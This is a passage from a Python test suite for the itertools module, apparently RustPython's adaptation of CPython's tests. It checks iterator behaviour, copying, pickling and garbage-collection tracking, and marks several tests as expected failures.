self.assertRaises(TypeError, filter, isEven, 3)
self.assertRaises(TypeError, next, filter(range(6), range(6)))
# check copy, deepcopy, pickle
ans = [0,2,4]
c = filter(isEven, range(6))
self.assertEqual(list(copy.copy(c)), ans)
c = filter(isEven, range(6))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans)
next(c)
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans[1:])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filterfalse(self):
self.assertEqual(list(filterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(filterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(filterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, filterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, filterfalse)
self.assertRaises(TypeError, filterfalse, lambda x:x)
self.assertRaises(TypeError, filterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filterfalse, isEven, 3)
self.assertRaises(TypeError, next, filterfalse(range(6), range(6)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, filterfalse(isEven, range(6)))
def test_zip(self):
# XXX This is rather silly now that builtin zip() calls zip()...
ans = [(x,y) for x, y in zip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(zip('abc', range(6))), lzip('abc', range(6)))
self.assertEqual(list(zip('abcdef', range(3))), lzip('abcdef', range(3)))
self.assertEqual(take(3,zip('abcdef', count())), lzip('abcdef', range(3)))
self.assertEqual(list(zip('abcdef')), lzip('abcdef'))
self.assertEqual(list(zip()), lzip())
self.assertRaises(TypeError, zip, 3)
self.assertRaises(TypeError, zip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in zip('abc', 'def')],
lzip('abc', 'def'))
self.assertEqual([pair for pair in zip('abc', 'def')],
lzip('abc', 'def'))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_tuple_reuse(self):
ids = list(map(id, zip('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# check copy, deepcopy, pickle
ans = [(x,y) for x, y in copy.copy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
ans = [(x,y) for x, y in copy.deepcopy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(zip('abc',count()), proto))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
testIntermediate = zip('abc',count())
next(testIntermediate)
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(testIntermediate, proto))]
self.assertEqual(ans, [('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip('abc', count()))
def test_ziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
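# Expected result: pad the shorter inputs with None out to the length of the longest input.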
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(zip_longest(*args)), target)
self.assertEqual(list(zip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(zip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,zip_longest('abcdef', count())), list(zip('abcdef', range(3)))) # take 3 from infinite input
self.assertEqual(list(zip_longest()), list(zip()))
self.assertEqual(list(zip_longest([])), list(zip([])))
self.assertEqual(list(zip_longest('abcdef')), list(zip('abcdef')))
self.assertEqual(list(zip_longest('abc', 'defg', **{})),
list(zip(list('abc')+[None], 'defg'))) # empty keyword dict
self.assertRaises(TypeError, zip_longest, 3)
self.assertRaises(TypeError, zip_longest, range(3), 3)
for stmt in [
"zip_longest('abc', fv=1)",
"zip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise TypeError in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
self.assertEqual([pair for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_longest_tuple_reuse(self):
ids = list(map(id, zip_longest('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip_longest('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_zip_longest_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip_longest("abc", "def"))
self.pickletest(proto, zip_longest("abc", "defgh"))
self.pickletest(proto, zip_longest("abc", "defgh", fillvalue=1))
self.pickletest(proto, zip_longest("", "defgh"))
def test_zip_longest_bad_iterable(self):
exception = TypeError()
class BadIterable:
def __iter__(self):
raise exception
with self.assertRaises(TypeError) as cm:
zip_longest(BadIterable())
self.assertIs(cm.exception, exception)
def test_bug_7244(self):
class Repeater:
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def __next__(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code would fail in debug mode
# with an undetected error and a spurious StopIteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in zip_longest(r1, r2, fillvalue=0):
with support.captured_output('stdout'):
print((i, j))
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost
# and StopIteration would stop as expected
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = zip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_pairwise(self):
self.assertEqual(list(pairwise('')), [])
self.assertEqual(list(pairwise('a')), [])
self.assertEqual(list(pairwise('ab')),
[('a', 'b')]),
self.assertEqual(list(pairwise('abcde')),
[('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'e')])
self.assertEqual(list(pairwise(range(10_000))),
list(zip(range(10_000), range(1, 10_000))))
with self.assertRaises(TypeError):
pairwise() # too few arguments
with self.assertRaises(TypeError):
pairwise('abc', 10) # too many arguments
with self.assertRaises(TypeError):
pairwise(iterable='abc') # keyword arguments
with self.assertRaises(TypeError):
pairwise(None) # non-iterable argument
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
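# product1() is a reference implementation used to cross-check product(): it
# advances the index vector like an odometer, bumping the rightmost index that
# still has room and resetting every index to its right.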
def product1(*args, **kwds):
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', range(0), range(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_pickling(self):
# check copy, deepcopy, pickle
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(copy.copy(product(*args))), result)
self.assertEqual(list(copy.deepcopy(product(*args))), result)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, product(*args))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_issue_25021(self):
# test that indices are properly clamped to the length of the tuples
p = product((1, 2),(3,))
p.__setstate__((0, 0x1000)) # will access tuple element 1 if not clamped
self.assertEqual(next(p), (2, 3))
# test that empty tuple in the list will result in an immediate StopIteration
p = product((1, 2), (), (3,))
p.__setstate__((0, 0, 0x1000)) # will access tuple element 1 if not clamped
self.assertRaises(StopIteration, next, p)
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(lzip(range(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
# check copy, deepcopy, pickle
c = repeat(object='a', times=10)
self.assertEqual(next(c), 'a')
self.assertEqual(take(2, copy.copy(c)), list('a' * 2))
self.assertEqual(take(2, copy.deepcopy(c)), list('a' * 2))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, repeat(object='a', times=10))
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_map(self):
self.assertEqual(list(map(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(map(tupleize, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(map(tupleize, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,map(tupleize, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(map(operator.pow, [])), [])
self.assertRaises(TypeError, map)
self.assertRaises(TypeError, list, map(None, range(3), range(3)))
self.assertRaises(TypeError, map, operator.neg)
self.assertRaises(TypeError, next, map(10, range(5)))
self.assertRaises(ValueError, next, map(errfunc, [4], [5]))
self.assertRaises(TypeError, next, map(onearg, [4], [5]))
# check copy, deepcopy, pickle
ans = [('a',0),('b',1),('c',2)]
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.copy(c)), ans)
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = map(tupleize, 'abc', count())
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, zip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, starmap(10, [(4,5)]))
self.assertRaises(ValueError, next, starmap(errfunc, [(4,5)]))
self.assertRaises(TypeError, next, starmap(onearg, [(4,5)]))
# check copy, deepcopy, pickle
ans = [0**1, 1**2, 2**3]
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.copy(c)), ans)
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*args)))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*tgtargs)))
# Test stop=None
self.assertEqual(list(islice(range(10), None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), 2, None)), list(range(2, 10)))
self.assertEqual(list(islice(range(10), 1, None, 2)), list(range(1, 10, 2)))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test invalid arguments
ra = range(10)
self.assertRaises(TypeError, islice, ra)
self.assertRaises(TypeError, islice, ra, 1, 2, 3, 4)
self.assertRaises(ValueError, islice, ra, -5, 10, 1)
self.assertRaises(ValueError, islice, ra, 1, -5, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, 0)
self.assertRaises(ValueError, islice, ra, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1)
self.assertRaises(ValueError, islice, ra, 1, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1, 1)
self.assertRaises(ValueError, islice, ra, 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: Leave islice in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# check copy, deepcopy, pickle
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 3),
(20,)
]:
self.assertEqual(list(copy.copy(islice(range(100), *args))),
list(range(*args)))
self.assertEqual(list(copy.deepcopy(islice(range(100), *args))),
list(range(*args)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, islice(range(100), *args))
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
support.gc_collect()
self.assertIsNone(wr())
# Issue #30537: islice can accept integer-like objects as
# arguments
class IntLike(object):
def __init__(self, val):
self.val = val
def __index__(self):
return self.val
self.assertEqual(list(islice(range(100), IntLike(10))), list(range(10)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50))),
list(range(10, 50)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50), IntLike(5))),
list(range(10,50,5)))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, takewhile(10, [(4,5)]))
self.assertRaises(ValueError, next, takewhile(errfunc, [(4,5)]))
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, next, t)
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(takewhile(underten, data))), [1, 3, 5])
self.assertEqual(list(copy.deepcopy(takewhile(underten, data))),
[1, 3, 5])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, takewhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, dropwhile(10, [(4,5)]))
self.assertRaises(ValueError, next, dropwhile(errfunc, [(4,5)]))
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(dropwhile(underten, data))), [20, 2, 4, 6, 8])
self.assertEqual(list(copy.deepcopy(dropwhile(underten, data))),
[20, 2, 4, 6, 8])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, dropwhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee(self):
n = 200
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(lzip(a,b), lzip(range(n), range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), list(range(n)))
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in range(100):
self.assertEqual(next(a), i)
del a
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in range(100):
self.assertEqual(next(a), i)
del b
self.assertEqual(list(a), list(range(100, n)))
for j in range(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = next(its[i])
lists[i].append(value)
self.assertEqual(lists[0], list(range(n)))
self.assertEqual(lists[1], list(range(n)))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(range(2000), 3)
for i in range(100):
self.assertEqual(next(a), i)
self.assertEqual(list(b), list(range(2000)))
self.assertEqual([next(c), next(c)], list(range(2)))
self.assertEqual(list(a), list(range(100,2000)))
self.assertEqual(list(c), list(range(2,2000)))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in range(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual([list(x) for x in result], [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weakly referenceable
a, b = tee(range(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
self.assertRaises(ReferenceError, getattr, p, '__class__')
ans = list('abc')
long_ans = list(range(10000))
# check copy
a, b = tee('abc')
self.assertEqual(list(copy.copy(a)), ans)
self.assertEqual(list(copy.copy(b)), ans)
a, b = tee(list(range(10000)))
self.assertEqual(list(copy.copy(a)), long_ans)
self.assertEqual(list(copy.copy(b)), long_ans)
# check partially consumed copy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.copy(a)), ans[2:])
self.assertEqual(list(copy.copy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.copy(a)), long_ans[100:])
self.assertEqual(list(copy.copy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check deepcopy
a, b = tee('abc')
self.assertEqual(list(copy.deepcopy(a)), ans)
self.assertEqual(list(copy.deepcopy(b)), ans)
self.assertEqual(list(a), ans)
self.assertEqual(list(b), ans)
a, b = tee(range(10000))
self.assertEqual(list(copy.deepcopy(a)), long_ans)
self.assertEqual(list(copy.deepcopy(b)), long_ans)
self.assertEqual(list(a), long_ans)
self.assertEqual(list(b), long_ans)
# check partially consumed deepcopy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.deepcopy(a)), ans[2:])
self.assertEqual(list(copy.deepcopy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.deepcopy(a)), long_ans[100:])
self.assertEqual(list(copy.deepcopy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check pickle
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, iter(tee('abc')))
a, b = tee('abc')
self.pickletest(proto, a, compare=ans)
self.pickletest(proto, b, compare=ans)
# Issue 13454: Crash when deleting backward iterator from tee()
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def __next__(self):
first = self.first
self.first = False
if first:
return next(b)
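# The first next() on this iterator re-enters the same tee group through b, so
# tee's __next__ is invoked recursively; the test below expects this to be
# reported as a RuntimeError mentioning "tee" rather than a crash or hang.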
a, b = tee(I())
with self.assertRaisesRegex(RuntimeError, "tee"):
next(a)
@unittest.skip("TODO: RUSTPYTHON, hangs")
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def __next__(self):
start.set()
finish.wait()
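# The worker thread blocks inside next(a) between start.set() and finish.wait()
# while the main thread calls next(b) on the same tee group; concurrent use is
# expected to raise RuntimeError instead of corrupting shared state.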
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegex(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, next, zip())
for f in (chain, cycle, zip, groupby):
self.assertRaises(StopIteration, next, f([]))
self.assertRaises(StopIteration, next, f(StopNow()))
self.assertRaises(StopIteration, next, islice([], None))
self.assertRaises(StopIteration, next, islice(StopNow(), None))
p, q = tee([])
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
p, q = tee(StopNow())
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
self.assertRaises(StopIteration, next, repeat(None, 0))
for f in (filter, filterfalse, map, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, next, f(lambda x:x, []))
self.assertRaises(StopIteration, next, f(lambda x:x, StopNow()))
@support.cpython_only
def test_combinations_result_gc(self):
# bpo-42536: combinations's tuple-reuse speed trick breaks the GC's
# assumptions about what can be untracked. Make sure we re-track result
# tuples whenever we reuse them.
it = combinations([None, []], 1)
next(it)
gc.collect()
# That GC collection probably untracked the recycled internal result
# tuple, which has the value (None,). Make sure it's re-tracked when
# it's mutated and returned from __next__:
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_combinations_with_replacement_result_gc(self):
# Ditto for combinations_with_replacement.
it = combinations_with_replacement([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_permutations_result_gc(self):
# Ditto for permutations.
it = permutations([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_product_result_gc(self):
# Ditto for product.
it = product([None, []])
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_zip_longest_result_gc(self):
# Ditto for zip_longest.
it = zip_longest([[]])
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
class TestExamples(unittest.TestCase):
def test_accumulate(self):
self.assertEqual(list(accumulate([1,2,3,4,5])), [1, 3, 6, 10, 15])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible(self):
# check copy, deepcopy, pickle
data = [1, 2, 3, 4, 5]
accumulated = [1, 3, 6, 10, 15]
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = accumulate(data)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[:])
self.assertEqual(next(it), 1)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[1:])
it = accumulate(data)
self.assertEqual(next(it), 1)
self.assertEqual(list(copy.deepcopy(it)), accumulated[1:])
self.assertEqual(list(copy.copy(it)), accumulated[1:])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible_none(self):
# Issue #25718: total is None
it = accumulate([None, None, None], operator.is_)
self.assertEqual(next(it), None)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it_copy = pickle.loads(pickle.dumps(it, proto))
self.assertEqual(list(it_copy), [True, False])
self.assertEqual(list(copy.deepcopy(it)), [True, False])
self.assertEqual(list(copy.copy(it)), [True, False])
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_filter(self):
self.assertEqual(list(filter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_filterfalse(self):
self.assertEqual(list(filterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_map(self):
self.assertEqual(list(map(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_zip(self):
self.assertEqual(list(zip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_zip_longest(self):
self.assertEqual(list(zip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
list(map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split())))
self.assertEqual(list(permutations(range(3))),
